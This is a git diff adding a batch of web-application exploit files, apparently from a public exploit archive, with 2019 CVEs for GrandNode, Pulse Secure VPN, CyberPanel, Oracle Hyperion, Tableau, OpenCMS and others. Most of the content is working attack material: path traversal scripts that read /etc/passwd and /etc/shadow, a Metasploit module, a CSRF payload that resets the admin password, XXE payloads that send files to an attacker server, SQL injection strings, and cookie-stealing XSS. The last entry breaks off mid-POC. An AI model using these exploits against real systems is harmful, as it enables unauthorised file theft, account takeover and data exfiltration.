+
+
+POC :
+
+step 1 :
+
+ create a sahi test automation script with the following content and save the file with ".sah" extension ( example : poc.sah) :
+
+            var $tc1 = _testcase(“TC-1″,”<script>alert(document.cookie)</script>”).start();
+
+           _log(“testing stored XSS injection”);
+
+            $tc1.end();
+
+Step 2 :
+
+Execute the created script ( poc.sah ) using sahi GUI controller .
+
+Step 3 : navigate to the web logs console ( http://<ip>:<port>/logs ) using the browser for the executed script. XSS is triggered .
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47027.py b/exploits/multiple/webapps/47027.py
new file mode 100755
index 000000000..b950074e4
--- /dev/null
+++ b/exploits/multiple/webapps/47027.py
@@ -0,0 +1,59 @@
+# Exploit Title: GrandNode Path Traversal & Arbitrary File Download (Unauthenticated)
+# Date: 06/23/3019
+# Exploit Author: Corey Robinson (https://twitter.com/CRobSec)
+# Vendor Homepage: https://grandnode.com/
+# Software Link: https://github.com/grandnode/grandnode/archive/728ca1ea2f61aead7c8c443407096b0ef476e49e.zip
+# Version: <= v4.40 (before 5/30/2019)
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2019-12276
+
+'''
+CVE-2019-12276
+
+A path traversal vulnerability in the LetsEncryptController allows remote unauthenticated users to 
+view any files that the application has read/view permissions to. This vulnerability affects 
+Windows and Unix operating systems.
+
+For more details, see: https://security401.com/grandnode-path-traversal/
+
+'''
+
+import requests
+import argparse
+
+def exploit(url, file):
+    
+    session = requests.Session()
+
+    paramsGet = {"fileName":file}
+    rawBody = "\r\n"
+
+    response = session.get("{}/LetsEncrypt/Index".format(url), data=rawBody, params=paramsGet)
+
+    if "UnauthorizedAccessException" in response.content or response.status_code == 500:
+        print("Access to the path '{}' is denied.".format(file))
+        return	
+
+    content_length = int(response.headers['Content-Length'])
+
+    if content_length == 0:
+        print("The '{}' file was not found.".format(file))	
+    else:
+        print("-" *22)
+        print(response.content)
+        print("-" *22)
+
+
+if __name__ == "__main__":
+
+    parser = argparse.ArgumentParser(description='GrandNode CVE-2019-12276 Path traversal & Arbitrary File Download')
+    parser.add_argument('-u', action="store", dest="url", required=True, help='Target URL')
+    parser.add_argument('-f', action="store", dest="file", required=True, help='The file to download')
+    args = parser.parse_args()
+
+    exploit(args.url, args.file)
+
+# python gn.py -u http://172.16.2.22:5001 -f "/etc/passwd"
+# python gn.py -u http://172.16.2.22:5001 -f "../../../App_Data/Settings.txt"
+# python gn.py -u http://172.16.2.22:5001 -f "/etc/shadow"
+# python gn.py -u http://172.16.2.22:5001 -f "../../../web.config"
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47058.txt b/exploits/multiple/webapps/47058.txt
new file mode 100644
index 000000000..b458fee9a
--- /dev/null
+++ b/exploits/multiple/webapps/47058.txt
@@ -0,0 +1,21 @@
+===========================================================================================
+# Exploit Title: Varient 1.6.1 SQL Inj.
+# Dork: N/A
+# Date: 29-06-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://varient.codingest.com/
+# Software Link: https://varient.codingest.com/
+# Version: v1.6.1
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: the best news and magazine script
+===========================================================================================
+# POC - SQLi
+# Parameters : user_id
+# Attack Pattern :
+%27)/**/oR/**/3211170=3211170/**/aNd/**/(%276199%27)=(%276199
+# POST Method :
+https://site.com/unpleasant-nor-diminution-excellence-apartments-imprudence?parent_id=0&post_id=66&name=9956574&comment=[COMMENT
+HERE]7146048&user_id=99999999[SQL INJECT HERE]
+===========================================================================================
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47061.txt b/exploits/multiple/webapps/47061.txt
new file mode 100644
index 000000000..4add587b4
--- /dev/null
+++ b/exploits/multiple/webapps/47061.txt
@@ -0,0 +1,17 @@
+# Exploit Title: [Sensitive Information Disclosure in SAP Crystal Reports]
+# Date: [2019-04-10]
+# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
+# Vendor Homepage: [https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=517899114]
+# Version: [SAP Crystal Reports for Visual Studio, Version - 2010] (REQUIRED)
+# Tested on: [Windows 10]
+# CVE : [CVE-2019-0285]
+
+POC:
+
+1- Intercept the "Export" report http request
+
+2- Copy the "__CRYSTALSTATE" + <crystal report user control> Viewer name parameter value. 
+
+3- You will find a base64 value in "viewerstate" attribute. 
+
+4- decode the value you will get database information such as: name, credentials, Internal Path disclosure and some debugging information.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47062.py b/exploits/multiple/webapps/47062.py
new file mode 100755
index 000000000..897ff3b13
--- /dev/null
+++ b/exploits/multiple/webapps/47062.py
@@ -0,0 +1,40 @@
+# Exploit Title: Sahi pro (8.x) Directory traversal
+# Date: 2019-06-25
+# Exploit Author: Operat0r
+# Vendor Homepage: https://sahipro.com/
+# Software Link: https://sahipro.com/downloads-archive/
+# Version: 8.0
+# Tested on: Linux Ubuntu / Windows 7
+# CVE: CVE-2019-13063
+
+An issue was discovered in Safi-pro web-application, there is a directory traversal and both local and remote file inclusion vulnerability which resides in the ?script= parameter which is found on the Script_View page. And attacker can send a specially crafted URL to retrieve and steal sensitive files from teh victim.
+
+POC -
+
+http://10.0.0.167:9999/_s_/dyn/Script_view?script=/config/productkey.txt
+
+This results in the revealing of the applications product key. The ?script= can have ../../../../../ added to retrieve more files from the system
+
+POC tool -
+
+import argparse, requests, os
+
+#sahi_productkey = '/config/productkey.txt'
+#root_dir = '../../../../../../'
+#vuln_url = "http://10.0.0.167:9999/_s_/dyn/Script_view?script="
+
+print("[x] Proof of concept tool to exploit the directory traversal and local file"
+      " inclusion vulnerability that resides in the [REDACTED]\n[x] CVE-2019-xxxxxx\n")
+
+print("Example usage:\npython POC.y --url http://example:9999/_s_/dyn/Script_view?script=/config/productkey.txt")
+
+parser = argparse.ArgumentParser()
+parser.add_argument("--url",
+                    help='Specify the vulnerable URL')
+
+args = parser.parse_args()
+
+response = requests.get(args.url)
+file = open("output.txt", "w")
+file.write(response.text)
+file.close()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47063.html b/exploits/multiple/webapps/47063.html
new file mode 100644
index 000000000..6d8d78613
--- /dev/null
+++ b/exploits/multiple/webapps/47063.html
@@ -0,0 +1,22 @@
+# Title: CyberPanel Administrator Account Takeover <= v1.8.4
+# Date: 30.06.2019
+# Author: Bilgi Birikim Sistemleri
+# Vendor Homepage: https://cyberpanel.net/
+# Version: Up to v1.8.4.
+# CVE: CVE-2019-13056
+# mturkyilmaz@bilgibirikim.com & bilgibirikim.com
+
+# Description:
+# Attacker can edit administrator's credentials like email, password.
+# Then, access the administration panel and takeover the server.
+# A CSRF vulnerability.
+
+# How to Reproduce:
+# Attacker will create a website,
+# CyberPanel administrator will visit that website,
+# Administrator's e-mail and password will be changed automatically.
+
+# PoC:
+<script>
+fetch('https://SERVERIP:8090/users/saveModifications', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"accountUsername":"admin","firstName":"CSRF","lastName":"Vulnerable","email":"attackersemail@example.org","password":"attackerspassword"}'});
+</script>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47071.txt b/exploits/multiple/webapps/47071.txt
new file mode 100644
index 000000000..8981f58f8
--- /dev/null
+++ b/exploits/multiple/webapps/47071.txt
@@ -0,0 +1,81 @@
+# Exploit Title: Persistent XSS on Symantec DLP <= 15.5 MP1
+# Date: 2019-06-21
+# Exploit Author: Chapman Schleiss
+# Vendor Homepage: https://www.symantec.com/
+# Software Link: https://support.symantec.com/us/en/mysymantec.html
+# Version: <= 15.5 MP1
+# CVE : 2019-9701
+# Advisory-URL: https://support.symantec.com/us/en/article.SYMSA1484.html
+# Hot Fix: https://support.symantec.com/us/en/article.ALERT2664.html
+
+Description
+---------------
+Persistent XSS via 'name' param at
+/ProtectManager/enforce/admin/senderrecipientpatterns/list
+
+
+Payload: ' oNmouseover=prompt(document.domain,document.cookie) )
+Browser: Firefox 64, IE 11
+Date Observed: 15 January 2019
+
+
+Reproduction POST
+-----------------
+POST
+/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/update
+HTTP/1.1
+Host: [snip].com:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
+Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://
+[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 558
+Connection: close
+
+name=%27+oNmouseover%3Dprompt%28document.domain%2Cdocument.cookie%29+%29&description=some_text&userPatterns=test%
+40test.com&ipAddresses=192.168.1.1&urlDomains=mail.company.com
+&id=41&version=30
+
+Reproduction GET
+----------------
+GET /ProtectManager/enforce/admin/senderrecipientpatterns/list HTTP/1.1
+Host: [snip].com:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
+Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://
+[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
+Connection: close
+
+Reproduction Response
+---------------------
+<div id="messages-section">
+  <div class="message-pane alert-pane">
+      <div class="alert-message">
+        <div class="yui3-g message-pane-scroll">
+          <div class="yui3-u-1-24 message-icon">
+              <img src="/ProtectManager/graphics/success_icon.gif" alt="Success" width="19" height="19" />
+          </div>
+          <div class="yui3-u-11-12 wrapping-text">
+              <div id="web-status-message-163" class="message-content"> Recipient pattern '' oNmouseover=prompt(document.domain,document.cookie) )' was saved successfully.               </div>
+          </div>
+          <div class="yui3-u-1-24">
+              <div class="message-pane-actions">
+          <a href="#" class="message-back-to-element hidden action-icon">
+        <img src="/ProtectManager/graphics/general/scroll_back_16.png" alt="" title="Show affected object"/>
+          </a>
+          <a href="#" class="message-pane-close action-icon">
+        <img src="/ProtectManager/graphics/general/cancel_blue_16.png" alt=""  title="Close message bar"/>
+          </a>
+      </div>
+          </div>
+        </div>
+      </div>
+  </div>
+</div>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47196.txt b/exploits/multiple/webapps/47196.txt
new file mode 100644
index 000000000..0a8a4f685
--- /dev/null
+++ b/exploits/multiple/webapps/47196.txt
@@ -0,0 +1,53 @@
+- Exploit Title: XXE Injection Oracle Hyperion 
+- Exploit Author: Lucas Dinucci (idntk.lucdin@gmail.com)
+- Twitter: @identik1t
+- Vendor Homepage: https://www.oracle.com/applications/performance-management
+- Date: 02/11/2019
+- Affected Product: Oracle Hyperion Enterprise Performance Management System
+- Version: 11.1.2.3
+- CVE: CVE-2019-2861
+- Patch: https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
+- Vulnerability Type: https://cwe.mitre.org/data/definitions/611.html
+
+
+# XML External Entity (XXE) Injection 
+
+
+The event.pt1:pt_region0:1:pc2:fvtbl, event.pt1:pt_region0:1:findBtn1 and oracle.adf.view.rich.monitoring.UserActivityInfo parameters are prone to XXE injection. An authenticated attacker could exploit this vulnerability to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution and denial of service attacks.
+
+Path: http://host:19000/calcmgr/faces/cmshell?_adf.ctrl-state=i38w0cig2_4
+
+Parameters: event.pt1:pt_region0:1:pc2:fvtbl, event.pt1:pt_region0:1:findBtn1 and oracle.adf.view.rich.monitoring.UserActivityInfo (POST REQUEST)
+
+
+# Proof-of-concept
+
+
+1 - Create a file and name it as xxe_poc with the following content, replacing with your server address:
+
+	
+<!ENTITY % payload SYSTEM "file:///c:\\Windows\\win.ini">
+<!ENTITY % param1 "<!ENTITY &#x25; external SYSTEM 'http://your_server_address/log_xxe?data=%payload;'>">
+
+
+2 - Start a webserver to receive the connection, such as:
+
+
+sudo python -m SimpleHTTPServer 80
+
+
+3 - Place the following payload in one of the vulnerable parameters, replacing with your server address:
+
+
+<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://your_server_address/xxe_poc"> %pe; %param1; %external;]><m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>
+
+
+4 - Data retrivial:
+
+Serving HTTP on 0.0.0.0 port 8000 ...
+
+192.168.13.1 - - [11/Feb/2019 04:59:47] "GET /xxe_poc HTTP/1.1" 200 -
+
+192.168.13.1 - - [11/Feb/2019 04:59:47] code 404, message File not found
+
+192.168.13.1 - - [11/Feb/2019 04:59:47] "GET /log?data=; HTTP/1.1" 200 -;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files] HTTP/1.1" 400 -
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47198.txt b/exploits/multiple/webapps/47198.txt
new file mode 100644
index 000000000..12d4d9812
--- /dev/null
+++ b/exploits/multiple/webapps/47198.txt
@@ -0,0 +1,28 @@
+# Exploit Title:Web Studio Ultimate Loan Manager V2.0 - Persistent Cross Site Scripting
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: http://www.webstudio.co.zw/
+# Software Link: https://codecanyon.net/item/ultimate-loan-manager/19891884
+# Version: V2.0
+# Category: Webapps
+# Software Description : Ultimate Loan Manager is an online loam management system that allows lending businesses to manage their borrowers, loans, repayments, and collections with ease while being affordable at the same time.
+# CVE : CVE-2019-14427
+==================================================================
+
+#Description:XSS exists in WEB STUDIO Ultimate Loan Manager 2.0 by adding a branch under the Branches button that sets the notes parameter with crafted JavaScript code.
+
+
+
+POST /branch/store HTTP/1.1
+Host: target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target/branch/create
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+Cookie: XSRF-TOKEN=eyJpdiI6Imk3Y3llMlBkM0xOUHJNQ1NqYjg2dGc9PSIsInZhbHVlIjoiTmkxMlBlYnVTaHJYR0NZWWxNNEFrSE9PQ3UyUlA5OUg0eU1XUGoxWGR1UUJQbWk2KzRQVVhRTUhEMzBTWkVDMCIsIm1hYyI6Ijk0MGQxN2VhNGQzZDBhZjI4YTg4M2VkODE0NTVhNDFjNmM4MDEwM2U1NGQyOTM3N2FhZDZjMjdjNTUxYjE5ZDMifQ%3D%3D; laravel_session=U1GDgNLtFJQDdPa2jK8rb1vjWE6mkZ6XwrH0PxE7
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+_token=P31Y1Y1VoVj1yaN3lpSQfssubgRXYszMUpilyYSu&name=test&notes=%3cscript%3ealert(1)%3c%2fscript%3e
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47214.txt b/exploits/multiple/webapps/47214.txt
new file mode 100644
index 000000000..0e72ba7fe
--- /dev/null
+++ b/exploits/multiple/webapps/47214.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Aptana Jaxer Remote Local File inclusion
+# Date: 8/8/2019
+# Exploit Author: Steph Jensen
+# Vendor Homepage:
+[http://www.jaxer.org](http://www.jaxer.org/category/uncategorized/)
+# Version: 1.0.3.4547
+# Tested on: Linux
+# CVE : CVE-2019-14312
+
+Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via tools/sourceViewer/index.html?filename=../ URI.
+
+To exploit this vulnerability an attacker must have access to the Aptana Jaxer web application. The Samples and Tools page will have the wikilite demo. After opening the wikilite demo the source code can be viewed by clicking the html button and selecting "Wikilite source code". This leads to http://server:8081/aptana/tools/sourceViewer/index.html?filename=../../samples/wikilite/index.html. by using directory traversal in the filename parameter a remote attacker can access internal files on the server.
+
+PoC: http://server:8081/aptana/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47297.rb b/exploits/multiple/webapps/47297.rb
new file mode 100755
index 000000000..1376a19ca
--- /dev/null
+++ b/exploits/multiple/webapps/47297.rb
@@ -0,0 +1,76 @@
+# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
+# Google Dork: inurl:/dana-na/ filetype:cgi
+# Date: 8/20/2019
+# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
+# Vendor Homepage: https://pulsesecure.net
+# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
+# Tested on: Linux
+# CVE : CVE-2019-11510 
+require 'msf/core'
+class MetasploitModule < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Post::File
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Pulse Secure - System file leak',
+			'Description'    => %q{
+				Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
+        This exploit reads /etc/passwd as a proof of concept
+        This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
+			},
+			'References'     =>
+			    [
+			        [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]
+			    ],
+			'Author'         => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],
+			'License'        => MSF_LICENSE,
+			 'DefaultOptions' =>
+		      {
+		        'RPORT' => 443,
+		        'SSL' => true
+		      },
+			))
+
+	end
+
+
+	def run()
+		print_good("Checking target...")
+		res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)
+
+		if res && res.code == 200
+			print_good("Target is Vulnerable!")
+			data = res.body
+			current_host = datastore['RHOST']
+			filename = "msf_sslwebsession_"+current_host+".bin"
+			File.delete(filename) if File.exist?(filename)
+			file_local_write(filename, data)
+			print_good("Parsing file.......")
+			parse()
+		else
+			if(res && res.code == 404)
+				print_error("Target not Vulnerable")
+			else
+				print_error("Ooof, try again...")
+			end
+		end
+	end
+	def parse()
+		current_host = datastore['RHOST']
+
+	    fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
+	    words = 0
+	    while (line = fileObj.gets)
+	    	printable_data = line.gsub(/[^[:print:]]/, '.')
+	    	array_data = printable_data.scan(/.{1,60}/m)
+	    	for ar in array_data
+	    		if ar != "............................................................"
+	    			print_good(ar)
+	    		end
+	    	end
+	    	#print_good(printable_data)
+
+		end
+		fileObj.close
+	end
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47301.txt b/exploits/multiple/webapps/47301.txt
new file mode 100644
index 000000000..20101e864
--- /dev/null
+++ b/exploits/multiple/webapps/47301.txt
@@ -0,0 +1,15 @@
+# Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
+# Exploit Author: MAYASEVEN
+# Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/"
+# Published on 08/04/2019
+# Vendor Homepage at "https://wmspanel.com/nimble"
+# Affected Version 3.0.2-2 to 3.5.4-9
+# Tested on 3.5.4-9
+# CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal
+# Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability.
+#              Successful exploitation could allow an attacker to traverse the file system to access
+#              files or directories that are outside of the restricted directory on the remote server.
+
+
+POC :
+ - http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47308.py b/exploits/multiple/webapps/47308.py
new file mode 100755
index 000000000..316caaf56
--- /dev/null
+++ b/exploits/multiple/webapps/47308.py
@@ -0,0 +1,70 @@
+# Exploit Title: Tableau XXE 
+# Google Dork: N/A
+# Date: Reported to vendor July 2019, fix released August 2019.
+# Exploit Author: Jarad Kopf
+# Vendor Homepage: https://www.tableau.com/
+# Software Link: Tableau Desktop downloads: https://www.tableau.com/products/desktop/download
+# Version/Products: See Tableau Advisory: https://community.tableau.com/community/security-bulletins/blog/2019/08/22/important-adv-2019-030-xxe-vulnerability-in-tableau-products
+# Tested on: Windows
+# CVE: CVE-2019-15637
+
+#This comes from https://community.tableau.com/community/security-bulletins/blog/2019/08/22/important-adv-2019-030-xxe-vulnerability-in-tableau-products
+#Severity: High ======   CVSS3 Score: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L - 7.1 High ====== Product Specific Notes: Malicious workbooks, data sources, and extensions files that are published or used on Tableau Server can trigger this vulnerability
+#see also https://github.com/minecrater/exploits/blob/master/TableauXXE.py
+
+#Unfortunately as I did not have access to the source code a lot of this couldn't really be coded. 
+#Lot of this seems to be user specific (zoneid, dashboard etc). Virtually just taking the vulnerable request and running the exploit. 
+#Very bare bones...wish I could've done more, but maybe someone else with access to the source would want to do that as an exercise.
+
+import requests
+import sys 
+from warnings import filterwarnings
+
+# Globals
+proxy = 'http://127.0.0.1:8080'
+proxies = {'http':proxy, 'https':proxy}
+filterwarnings('ignore')
+
+def xxe(target, attackerserver, boundary, cookie, zoneid, dashboard):
+	payload = """<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE root PUBLIC "-//A/B/EN" """
+	payload += "\""+attackerserver+"\"><svg xmlns:svg=\"http://www.w3.org/2000/svg\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" width=\"200\" height=\"200\"><text x=\"0\" y=\"20\" font-size=\"20\">test</text></svg>"
+	headers = {'Content-Type': 'multipart/form-data; boundary='+boundary, 'Cookie': 'workgroup_session_id='+cookie}
+	data = "--"+boundary+"\r\n"
+	data += """Content-Disposition: form-data; name=\"zoneId\""""+"\r\n"
+	data += "\r\n"
+	#below will be different for each user - this is the zoneid of the dashboard you're exploiting this against
+	data += zoneid+ "\r\n"
+	data += "--"+boundary+"\r\n"
+	data += """Content-Disposition: form-data; name=\"dashboard\""""+"\r\n"
+	data += "\r\n"
+	#below will be different for each user - the name of the dashboard we have access to which we're exploiting this against
+	data += dashboard + "\r\n"
+	data += "--"+boundary+"\r\n"
+	data += """Content-Disposition: form-data; name=\"wasCanceled\""""+"\r\n"
+	data += "\r\n"
+	data += "false"
+	data += "\r\n"
+	data += "--"+boundary+"\r\n"
+	data += """Content-Disposition: form-data; name=\"extensionManifestContents\""""+"\r\n"
+	data += "\r\n"
+	data += payload
+	data += "\r\n"
+	data += "--"+boundary+"--"
+	
+	r = requests.post(target, headers=headers, data=data, proxies=proxies, verify=False)
+	
+def main():
+	if len(sys.argv) != 7:
+		print "(+) usage: %s <target><attackerserver><boundary><workgroup_session_id_cookie><zoneid><dashboardname>"  % sys.argv[0]
+		sys.exit(-1) 
+ 	target = sys.argv[1]	 
+	attackerserver = sys.argv[2]
+	boundary = sys.argv[3]
+	cookie = sys.argv[4]
+	zoneid = sys.argv[5]
+	dashboard = sys.argv[6]
+	xxe(target,attackerserver,boundary,cookie,zoneid,dashboard)
+	print "making request, make sure to catch the HTTP request!"
+	 
+if __name__ == "__main__":
+	main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47338.txt b/exploits/multiple/webapps/47338.txt
new file mode 100644
index 000000000..85aba63cb
--- /dev/null
+++ b/exploits/multiple/webapps/47338.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template
+# Google Dork: N/A
+# Date: 18/07/2019
+# Exploit Author: Aetsu
+# Vendor Homepage: http://www.opencms.org
+# Software Link: https://github.com/alkacon/apollo-template
+# Version: 10.5.x
+# Tested on: 10.5.5 / 10.5.4
+# CVE : CVE-2019-13234, CVE-2019-13235
+
+1. Reflected XSS in the search engine:
+- Affected resource -> "q"
+POC:
+```
+https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
+```
+2. Reflected XSS in login form:
+POC:
+The vulnerability appears when the header X-Forwarded-For is used as shown
+in the next request:
+```
+GET
+/login/index.html?requestedResource=&name=Editor&password=editor&action=login
+HTTP/1.1
+Host: example.com
+X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
+```
+
+
+Extended POCs: https://aetsu.github.io/OpenCms
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47339.txt b/exploits/multiple/webapps/47339.txt
new file mode 100644
index 000000000..0f62ad55d
--- /dev/null
+++ b/exploits/multiple/webapps/47339.txt
@@ -0,0 +1,135 @@
+# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms
+Site Management
+# Google Dork: N/A
+# Date: 18/07/2019
+# Exploit Author: Aetsu
+# Vendor Homepage: http://www.opencms.org
+# Software Link: https://github.com/alkacon/opencms-core
+# Version: 10.5.x
+# Tested on: 10.5.5 / 10.5.4
+# CVE : CVE-2019-13236
+
+1. In Site Management > New site (Stored XSS):
+- Affected resource title.0:
+POC:
+```
+POST /system/workplace/admin/sites/new.jsp HTTP/1.1
+Host: example.com
+title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se
+```
+2. In Treeview (Reflected XSS):
+- Affected resource type:
+POC:
+```
+http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=
+</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=
+```
+3. In Workspace tools > Login message (Stored XSS):
+- Affected resource message.0:
+POC:
+```
+POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
+Host: example.com
+enabled.0=true&enabled.0.value=true&message.0=<svg
+onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=
+```
+4. In Index sources > View index sources > New index source (Stored XSS):
+- Affected resource name.0:
+POC:
+```
+POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1
+Host: example.com
+name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=
+```
+5. In Index sources > View field configuration > New field configuration
+(Stored XSS):
+- Affected resource name.0:
+POC:
+```
+POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1
+Host: example.com
+name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=
+```
+6. In Account Management > Impor/Export user data (Reflected XSS):
+- Affected resource oufqn:
+POC:
+```
+POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp
+HTTP/1.1
+Host: example.com
+groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=
+```
+7. In Account Management > Group Management > New Group (Stored XSS):
+- Affected resources name.0 and description.0:
+POC:```
+POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
+Host: example.com
+name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27
+```
+8. In Account Management > Organizational Unit > Organizational Unit
+Management > New sub organizational unit (Stored XSS):
+- Affected resources parentOuDesc.0 and resources.0:
+POC:```
+POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1
+Host: example.com
+name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D
+```
+9. In Link Validator > External Link Validator > Validate External Links
+(Reflected XSS):
+- Affected resources reporttype, reportcontinuekey and title:
+POC:```
+POST
+/system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks
+HTTP/1.1
+Host: example.com
+dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK
+```
+10. In Administrator view > Database management > Extended html import >
+Default html values (Reflected XSS):
+- Affected resources destinationDir.0, imageGallery.0, linkGallery.0,
+downloadGallery.0:
+POC:```
